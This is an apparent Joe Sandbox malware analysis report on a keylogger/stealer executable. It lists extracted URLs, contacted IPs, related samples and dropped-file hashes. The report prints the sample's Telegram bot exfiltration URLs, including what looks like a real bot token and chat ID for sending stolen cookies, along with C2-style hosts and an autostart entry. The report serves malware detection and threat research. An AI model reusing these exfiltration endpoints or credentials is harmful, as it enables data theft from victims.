                              https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:376483%0D%0ADate%20and%20Time:%2011/01/2025%20/%2007:32:35%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20376483%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5Dfalse
                                		high
                                https://api.telegram.org/bot7489657060:AAEq5tTUQiWuuifDLGy6qn_cJN5txd73Csg/sendDocument?chat_id=1886630858&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ACookies%20%7C%20user%20%7C%20VIP%20Recoveryfalse
                                  		high

                                  URLs from Memory and Binaries

                                  NameSourceMaliciousAntivirus DetectionReputation
                                  https://www.office.com/RegSvcs.exe, 00000007.00000002.4529357872.00000000034E4000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    https://duckduckgo.com/chrome_newtabRegSvcs.exe, 00000003.00000002.4532596106.0000000003C81000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      https://duckduckgo.com/ac/?q=RegSvcs.exe, 00000003.00000002.4532596106.0000000003C81000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:376483%0D%0ADate%20aRegSvcs.exe, 00000003.00000002.4529175077.0000000002D46000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4529357872.00000000033D6000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          https://api.telegram.orgRegSvcs.exe, 00000003.00000002.4529175077.0000000002D46000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4529175077.0000000002D9D000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4529357872.000000000346F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4529357872.00000000033D6000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://www.google.com/images/branding/product/ico/googleg_lodp.icoRegSvcs.exe, 00000003.00000002.4532596106.0000000003C81000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              https://api.telegram.org/botRegSvcs.exe, 00000007.00000002.4529357872.000000000346F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4529357872.00000000033D6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                https://api.telegram.org/bot7489657060:AAEq5tTUQiWuuifDLGy6qn_cJN5txd73Csg/sendDocument?chat_id=1886RegSvcs.exe, 00000007.00000002.4529357872.000000000346F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://www.office.com/lBRegSvcs.exe, 00000003.00000002.4529175077.0000000002E4E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4529357872.00000000034DF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=RegSvcs.exe, 00000003.00000002.4532596106.0000000003C81000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://checkip.dyndns.orgRegSvcs.exe, 00000003.00000002.4529175077.0000000002C61000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4529357872.00000000032F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=RegSvcs.exe, 00000003.00000002.4532596106.0000000003C81000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4532685097.0000000004313000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://api.telegram.org/bot/sendMessage?chat_id=&text=RegSvcs.exe, 00000003.00000002.4529175077.0000000002D46000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4529357872.00000000033D6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://chrome.google.com/webstore?hl=enRegSvcs.exe, 00000007.00000002.4529357872.00000000034B3000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4529357872.00000000034E4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://www.ecosia.org/newtab/RegSvcs.exe, 00000003.00000002.4532596106.0000000003C81000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4532685097.0000000004313000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://varders.kozow.com:8081ectosphere.exe, 00000002.00000002.2132554005.00000000031E0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4529175077.0000000002C61000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4526688861.0000000000434000.00000040.80000000.00040000.00000000.sdmp, ectosphere.exe, 00000006.00000002.2294799586.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4529357872.00000000032F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  http://aborters.duckdns.org:8081ectosphere.exe, 00000002.00000002.2132554005.00000000031E0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4529175077.0000000002C61000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4526688861.0000000000434000.00000040.80000000.00040000.00000000.sdmp, ectosphere.exe, 00000006.00000002.2294799586.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4529357872.00000000032F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://ac.ecosia.org/autocomplete?q=RegSvcs.exe, 00000003.00000002.4532596106.0000000003C81000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4532685097.0000000004313000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      http://51.38.247.67:8081/_send_.php?LRegSvcs.exe, 00000003.00000002.4529175077.0000000002D9D000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4529357872.000000000346F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        http://anotherarmy.dns.army:8081ectosphere.exe, 00000002.00000002.2132554005.00000000031E0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4529175077.0000000002C61000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4526688861.0000000000434000.00000040.80000000.00040000.00000000.sdmp, ectosphere.exe, 00000006.00000002.2294799586.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4529357872.00000000032F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchRegSvcs.exe, 00000003.00000002.4532596106.0000000003C81000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4532685097.0000000004313000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            http://checkip.dyndns.org/qectosphere.exe, 00000002.00000002.2132554005.00000000031E0000.00000004.00001000.00020000.00000000.sdmp, ectosphere.exe, 00000006.00000002.2294799586.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4526700849.0000000000435000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                              		high
                                                                              https://chrome.google.com/webstore?hl=enlBRegSvcs.exe, 00000003.00000002.4529175077.0000000002E1D000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4529357872.00000000034AE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://reallyfreegeoip.org/xml/8.46.123.189$RegSvcs.exe, 00000003.00000002.4529175077.0000000002D1E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4529175077.0000000002D46000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4529175077.0000000002CD9000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4529357872.00000000033AE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4529357872.00000000033D6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4529357872.0000000003369000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://reallyfreegeoip.orgRegSvcs.exe, 00000003.00000002.4529175077.0000000002D1E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4529175077.0000000002CAF000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4529175077.0000000002D46000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4529357872.00000000033AE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4529357872.00000000033D6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4529357872.000000000333F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    http://api.telegram.orgRegSvcs.exe, 00000003.00000002.4529175077.0000000002DB1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4529175077.0000000002D9D000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4529357872.000000000346F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4529357872.0000000003496000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameRegSvcs.exe, 00000003.00000002.4529175077.0000000002C61000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4529357872.00000000032F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=RegSvcs.exe, 00000003.00000002.4532596106.0000000003C81000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4532685097.0000000004313000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencodedectosphere.exe, 00000002.00000002.2132554005.00000000031E0000.00000004.00001000.00020000.00000000.sdmp, ectosphere.exe, 00000006.00000002.2294799586.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4526700849.0000000000435000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                            		high
                                                                                            https://reallyfreegeoip.org/xml/ectosphere.exe, 00000002.00000002.2132554005.00000000031E0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4529175077.0000000002CAF000.00000004.00000800.00020000.00000000.sdmp, ectosphere.exe, 00000006.00000002.2294799586.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4529357872.000000000333F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4526700849.0000000000435000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                              		high

                                                                                              World Map of Contacted IPs

                                                                                              • No. of IPs < 25%
                                                                                              • 25% < No. of IPs < 50%
                                                                                              • 50% < No. of IPs < 75%
                                                                                              • 75% < No. of IPs

                                                                                              Public IPs

                                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                                              149.154.167.220
                                                                                              		api.telegram.orgUnited Kingdom
                                                                                              		62041TELEGRAMRUfalse
                                                                                              193.122.6.168
                                                                                              		checkip.dyndns.comUnited States
                                                                                              		31898ORACLE-BMC-31898USfalse
                                                                                              104.21.80.1
                                                                                              		reallyfreegeoip.orgUnited States
                                                                                              		13335CLOUDFLARENETUSfalse

                                                                                              General Information

                                                                                              Joe Sandbox version:42.0.0 Malachite
                                                                                              Analysis ID:1588367
                                                                                              Start date and time:2025-01-11 01:26:41 +01:00
                                                                                              Joe Sandbox product:CloudBasic
                                                                                              Overall analysis duration:0h 10m 59s
                                                                                              Hypervisor based Inspection enabled:false
                                                                                              Report type:full
                                                                                              Cookbook file name:default.jbs
                                                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                              Number of analysed new started processes analysed:9
                                                                                              Number of new started drivers analysed:0
                                                                                              Number of existing processes analysed:0
                                                                                              Number of existing drivers analysed:0
                                                                                              Number of injected processes analysed:0
                                                                                              Technologies:
                                                                                              • HCA enabled
                                                                                              • EGA enabled
                                                                                              • AMSI enabled
                                                                                              Analysis Mode:default
                                                                                              Analysis stop reason:Timeout
                                                                                              Sample name:6BRa130JDj.exe
                                                                                              renamed because original name is a hash value
                                                                                              Original Sample Name:e036b840f2d4ce7a8e097d3f8309d2363239f837936161ffb9527cec62987f87.exe
                                                                                              Detection:MAL
                                                                                              Classification:mal100.troj.spyw.expl.evad.winEXE@10/6@3/3
                                                                                              EGA Information:
                                                                                              • Successful, ratio: 80%
                                                                                              HCA Information:
                                                                                              • Successful, ratio: 100%
                                                                                              • Number of executed functions: 56
                                                                                              • Number of non-executed functions: 277
                                                                                              Cookbook Comments:
                                                                                              • Found application associated with file extension: .exe
                                                                                              • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                                                              Warnings

                                                                                              • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                                              • Excluded IPs from analysis (whitelisted): 13.107.246.45, 4.245.163.56
                                                                                              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, dns.msftncsi.com, fe3cr.delivery.mp.microsoft.com
                                                                                              • Execution Graph export aborted for target RegSvcs.exe, PID 6148 because it is empty
                                                                                              • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                              • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                              • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                              • VT rate limit hit for: 6BRa130JDj.exe

                                                                                              Simulations

                                                                                              Behavior and APIs

                                                                                              TimeTypeDescription
                                                                                              01:27:42AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ectosphere.vbs
                                                                                              19:27:42API Interceptor14188078x Sleep call for process: RegSvcs.exe modified

                                                                                              Joe Sandbox View / Context

                                                                                              IPs

                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                              149.154.167.2204AMVusDMPP.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                JGvCEaqruI.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                                                                                                  TjoY7n65om.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                    Kb94RzMYNf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                      WGi85dsMNp.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                        cOH7jKmo25.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                                                                                                          3i1gMM8K4z.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                            2NJzy3tiny.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                              z87sammylastborn.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                vnV17JImCH.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                  193.122.6.168h1HIe1rt4D.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                  • checkip.dyndns.org/
                                                                                                                  2NJzy3tiny.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                  • checkip.dyndns.org/
                                                                                                                  czHx16QwGQ.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                  • checkip.dyndns.org/
                                                                                                                  Yef4EqsQha.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                  • checkip.dyndns.org/
                                                                                                                  xXUnP7uCBJ.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                  • checkip.dyndns.org/
                                                                                                                  ajRZflJ2ch.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                  • checkip.dyndns.org/
                                                                                                                  hZbkP3TJBJ.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                  • checkip.dyndns.org/
                                                                                                                  9L83v5j083.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                  • checkip.dyndns.org/
                                                                                                                  FILHKLtCw0.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                  • checkip.dyndns.org/
                                                                                                                  m0CZ8H4jfl.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                  • checkip.dyndns.org/

                                                                                                                  Domains

                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                  checkip.dyndns.com4AMVusDMPP.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                  • 132.226.247.73
                                                                                                                  VCU262Y2QB.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                  • 193.122.130.0
                                                                                                                  h1HIe1rt4D.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                  • 193.122.130.0
                                                                                                                  yqfze5TKW7.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                  • 158.101.44.242
                                                                                                                  4AMVusDMPP.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                  • 193.122.130.0
                                                                                                                  VCU262Y2QB.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                  • 158.101.44.242
                                                                                                                  h1HIe1rt4D.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                  • 193.122.6.168
                                                                                                                  tVuAoupHhZ.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                  • 193.122.130.0
                                                                                                                  TjoY7n65om.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                  • 132.226.247.73
                                                                                                                  Kb94RzMYNf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                  • 132.226.247.73
                                                                                                                  reallyfreegeoip.org4AMVusDMPP.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                  • 104.21.32.1
                                                                                                                  VCU262Y2QB.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                  • 104.21.48.1
                                                                                                                  h1HIe1rt4D.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                  • 104.21.96.1
                                                                                                                  yqfze5TKW7.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                  • 104.21.112.1
                                                                                                                  VCU262Y2QB.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                  • 104.21.16.1
                                                                                                                  h1HIe1rt4D.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                  • 104.21.96.1
                                                                                                                  tVuAoupHhZ.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                  • 104.21.32.1
                                                                                                                  TjoY7n65om.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                  • 104.21.80.1
                                                                                                                  Kb94RzMYNf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                  • 104.21.16.1
                                                                                                                  WGi85dsMNp.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                  • 104.21.16.1
                                                                                                                  api.telegram.org4AMVusDMPP.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                  • 149.154.167.220
                                                                                                                  JGvCEaqruI.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                                                                                                                  • 149.154.167.220
                                                                                                                  TjoY7n65om.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                  • 149.154.167.220
                                                                                                                  Kb94RzMYNf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                  • 149.154.167.220
                                                                                                                  WGi85dsMNp.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                  • 149.154.167.220
                                                                                                                  cOH7jKmo25.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                                                                                                                  • 149.154.167.220
                                                                                                                  3i1gMM8K4z.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                  • 149.154.167.220
                                                                                                                  2NJzy3tiny.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                  • 149.154.167.220
                                                                                                                  z87sammylastborn.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                  • 149.154.167.220
                                                                                                                  vnV17JImCH.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                  • 149.154.167.220

                                                                                                                  ASNs

                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                  ORACLE-BMC-31898USVCU262Y2QB.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                  • 193.122.130.0
                                                                                                                  h1HIe1rt4D.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                  • 193.122.130.0
                                                                                                                  yqfze5TKW7.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                  • 158.101.44.242
                                                                                                                  4AMVusDMPP.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                  • 193.122.130.0
                                                                                                                  VCU262Y2QB.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                  • 158.101.44.242
                                                                                                                  h1HIe1rt4D.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                  • 193.122.6.168
                                                                                                                  tVuAoupHhZ.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                  • 193.122.130.0
                                                                                                                  phish_alert_sp2_2.0.0.0(4).emlGet hashmaliciousUnknownBrowse
                                                                                                                  • 192.29.202.93
                                                                                                                  https://app.online.mt.com/e/es?s=961579678&e=14507707&elqTrackId=4f40dcb3a3854013ad3a46d461cc3aff&elq=5140e028df1a42afab491350388fd129&elqaid=221811&elqat=1&elqcst=272&elqcsid=2325629&elqak=8AF5D97DFF9E423CC7C7524F5CA3C1A86F5F67341B9DF612D5A2FB20DE928F2AA351Get hashmaliciousUnknownBrowse
                                                                                                                  • 192.29.202.93
                                                                                                                  https://app.online.mt.com/e/es?s=961579678&e=14507707&elqTrackId=4f40dcb3a3854013ad3a46d461cc3aff&elq=5140e028df1a42afab491350388fd129&elqaid=221811&elqat=1&elqcst=272&elqcsid=2325629&elqak=8AF5D97DFF9E423CC7C7524F5CA3C1A86F5F67341B9DF612D5A2FB20DE928F2AA351Get hashmaliciousUnknownBrowse
                                                                                                                  • 192.29.202.93
                                                                                                                  TELEGRAMRU4AMVusDMPP.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                  • 149.154.167.220
                                                                                                                  JGvCEaqruI.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                                                                                                                  • 149.154.167.220
                                                                                                                  TjoY7n65om.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                  • 149.154.167.220
                                                                                                                  Kb94RzMYNf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                  • 149.154.167.220
                                                                                                                  WGi85dsMNp.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                  • 149.154.167.220
                                                                                                                  cOH7jKmo25.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                                                                                                                  • 149.154.167.220
                                                                                                                  3i1gMM8K4z.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                  • 149.154.167.220
                                                                                                                  2NJzy3tiny.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                  • 149.154.167.220
                                                                                                                  z87sammylastborn.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                  • 149.154.167.220
                                                                                                                  vnV17JImCH.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                  • 149.154.167.220
                                                                                                                  CLOUDFLARENETUS4AMVusDMPP.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                  • 104.21.32.1
                                                                                                                  BcF3o0Egke.exeGet hashmaliciousFormBookBrowse
                                                                                                                  • 104.21.15.100
                                                                                                                  VCU262Y2QB.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                  • 104.21.48.1
                                                                                                                  h1HIe1rt4D.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                  • 104.21.96.1
                                                                                                                  ukBQ4ch2nE.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                  • 104.26.13.205
                                                                                                                  yqfze5TKW7.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                  • 104.21.112.1
                                                                                                                  JGvCEaqruI.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                                                                                                                  • 104.16.185.241
                                                                                                                  VCU262Y2QB.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                  • 104.21.16.1
                                                                                                                  http://unikuesolutions.com/ck/bd/%7BRANDOM_NUMBER05%7D/YmVuc29uLmxpbkB2aGFjb3JwLmNvbQ==Get hashmaliciousUnknownBrowse
                                                                                                                  • 188.114.97.3
                                                                                                                  h1HIe1rt4D.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                  • 104.21.96.1

                                                                                                                  JA3 Fingerprints

                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                  54328bd36c14bd82ddaa0c04b25ed9ad4AMVusDMPP.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                  • 104.21.80.1
                                                                                                                  VCU262Y2QB.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                  • 104.21.80.1
                                                                                                                  h1HIe1rt4D.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                  • 104.21.80.1
                                                                                                                  yqfze5TKW7.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                  • 104.21.80.1
                                                                                                                  VCU262Y2QB.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                  • 104.21.80.1
                                                                                                                  h1HIe1rt4D.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                  • 104.21.80.1
                                                                                                                  tVuAoupHhZ.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                  • 104.21.80.1
                                                                                                                  TjoY7n65om.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                  • 104.21.80.1
                                                                                                                  Kb94RzMYNf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                  • 104.21.80.1
                                                                                                                  WGi85dsMNp.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                  • 104.21.80.1
                                                                                                                  3b5074b1b5d032e5620f69f9f700ff0e4AMVusDMPP.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                  • 149.154.167.220
                                                                                                                  ukBQ4ch2nE.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                  • 149.154.167.220
                                                                                                                  JGvCEaqruI.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                                                                                                                  • 149.154.167.220
                                                                                                                  J4CcLMNm55.exeGet hashmaliciousUnknownBrowse
                                                                                                                  • 149.154.167.220
                                                                                                                  J4CcLMNm55.exeGet hashmaliciousUnknownBrowse
                                                                                                                  • 149.154.167.220
                                                                                                                  ru52XOQ1p7.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                  • 149.154.167.220
                                                                                                                  TjoY7n65om.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                  • 149.154.167.220
                                                                                                                  Kb94RzMYNf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                  • 149.154.167.220
                                                                                                                  WGi85dsMNp.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                  • 149.154.167.220
                                                                                                                  4z8Td6Kv8R.exeGet hashmaliciousUnknownBrowse
                                                                                                                  • 149.154.167.220

                                                                                                                  Dropped Files

                                                                                                                  No context

                                                                                                                  Created / dropped Files

                                                                                                                  C:\Users\user\AppData\Local\Allene\ectosphere.exe

                                                                                                                  Download File
                                                                                                                  Process:C:\Users\user\Desktop\6BRa130JDj.exe
                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):1055744
                                                                                                                  Entropy (8bit):7.051987070428753
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:24576:Du6J33O0c+JY5UZ+XC0kGso6FaPAlbrjFTSd7DqBWY:Nu0c++OCvkGs9FaP6FTy7D/Y
                                                                                                                  MD5:CB47B81059D6E0B15AD2AB00C3491C48
                                                                                                                  SHA1:4CF91A5E49A4D17F2C0D35BC52DEE15ECDF155DC
                                                                                                                  SHA-256:E036B840F2D4CE7A8E097D3F8309D2363239F837936161FFB9527CEC62987F87
